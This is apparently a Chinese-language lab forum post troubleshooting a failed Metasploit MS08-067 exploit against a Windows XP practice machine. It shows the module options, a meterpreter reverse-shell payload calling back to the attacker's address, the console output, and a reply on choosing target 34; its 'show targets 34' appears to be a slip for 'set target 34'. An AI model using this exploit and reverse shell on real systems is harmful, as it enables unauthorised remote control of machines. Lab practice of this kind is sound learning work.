靶机已经打开445端口,且可以被meta检测到
使用MS08-067设置好之后,一直失败。
具体情况如下:
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.133 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
使用exploit之后
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.88.137:4444
[*] 192.168.88.133:445 - Automatically detecting the target...
[*] 192.168.88.133:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:Chinese - Traditional
[-] 192.168.88.133:445 - Could not determine the exact service pack
[-] 192.168.88.133:445 - Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
请问各位遇到过同样的事情么,以尝试多次,包括修改了targets 的值
可以在exploit之前,查看攻击模块支持攻击的系统,命令show targets ,找到系统是Windows xp中文简体,它对应的是34我们设置34即可,show targets 34。然后再去exploit。
通过shell进入终端,然后输入chcp 65001解决乱码的问题。